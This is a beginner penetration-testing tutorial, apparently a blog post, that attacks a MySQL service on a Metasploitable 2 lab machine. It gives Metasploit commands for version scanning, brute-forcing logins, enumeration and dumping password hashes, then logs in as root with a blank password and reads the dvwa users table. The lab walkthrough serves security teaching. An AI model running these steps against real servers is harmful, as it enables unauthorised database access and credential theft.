In this article we are going to perform penetration testing on mysql server, here we will perform attack through metasploit framework.
Attacker: kali Linux
Target: metasploitable II
Lets Begin!!
192.168.1.103 is our target IP. Firstly type NMAP command to scan the target IP to make sure whether the mysql service is running on host IP or not. Here you can see port 3306 is open for mysql service.
nmap -sV 192.168.1.103
Now start the metasploit type type following command in kali terminal
Msfconsole
Enumerates the version of MySQL servers.
msf > use auxiliary/scanner/mysql/mysql_version
msf auxiliary(mysql_version) > set rhosts 192.168.1.103
msf auxiliary(mysql_version) > set rport 3306
msf auxiliary(mysql_version) >expoit
Here it had shown the version of MYSQL is 5.0.51a-3ubuntu5 and if you noticed the same result we have got from nmap version scan.
This module simply queries the MySQL instance for a specific user/pass (default is root with blank).
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set rhosts 192.168.1.103
msf auxiliary(mysql_login) > set rport 3306
msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txt
msf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txt
msf auxiliary(mysql_login) > exploit
Here we got successful result as root which does not required any password for login into mysql server.
This module allows for simple enumeration of MySQL Database Server provided proper credentials to connect remotely.
msf > use auxiliary/admin/mysql/mysql_enum
msf auxiliary(mysql_enum) > set rhost 192.168.1.103
msf auxiliary(mysql_enum) > set username root
msf auxiliary(mysql_enum) > exploit
This module extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking.
msf > use auxiliary/scanner/mysql/mysql_hashdump
msf auxiliary(mysql_hashdump) > set rhosts 192.168.1.103
msf auxiliary(mysql_hashdump) > set username root
msf auxiliary(mysql_hashdump) > exploit
Now from screenshot you can read the password given for users.
Now we have enumerated much information with the help of metasploit now let’s try to connect with MYSQL server in order to dump its data. Type following command on terminal
mysql -h 192.168.1.103 -u root –p
Hit enter for password; here we got access of MYSQL server now I am going to fetch its data.
mysql> show databases;
it has shown all databases name present inside it. Let’s check the tables inside the dvwa.
mysql> show tables from dvwa;
Let’s fetch the data inside dvwa database; now type following command.
mysql> use dvwa;
Now we can fetch the data present inside the database dvwa.
mysql> show tables;
mysql> select * from users;
Now you can see I have got all users name with their hash password.
Try it yourself for others database details.
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here
The post Beginner Guide of mysql Penetration Testing appeared first on Hacking Articles.